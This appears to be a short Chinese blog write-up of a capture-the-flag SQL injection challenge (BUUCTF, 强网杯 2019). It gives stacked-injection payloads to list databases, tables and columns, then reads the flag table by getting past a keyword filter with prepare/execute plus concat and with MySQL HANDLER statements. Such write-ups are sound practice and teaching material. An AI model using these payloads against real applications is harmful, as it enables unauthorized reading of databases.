9.2 BUUCTF [强网杯 2019]随便注

终于碰到一道 sqlmap不能用的sql注入题了

sqlmap只能爆出一个supersqli表 所以只能手动注入
这题 ban了 select where update ...
所以用堆叠注入

?inject=1' ; show databases; -- -

image

?inject=1' ; show tables; -- -

image

?inject=1' ; show columns from `1919810931114514`

注意 如果表名是数字一定要用 ``框起来
image

接下来就要提取 flag 只是 select都被ban了 ...

新姿势: 预编译

?inject=1' ;prepare hack from concat("s","elect flag from `1919810931114514`");execute hack;

类似 C++的define感觉 同时用concat绕过
image

还可以用 handler
payload:

?inject=1';handler `1919810931114514` open;handler `1919810931114514` read first;handler `1919810931114514` close;#

image

posted @ 2024-02-29 23:51  N0zoM1z0  阅读(36)  评论(0编辑  收藏  举报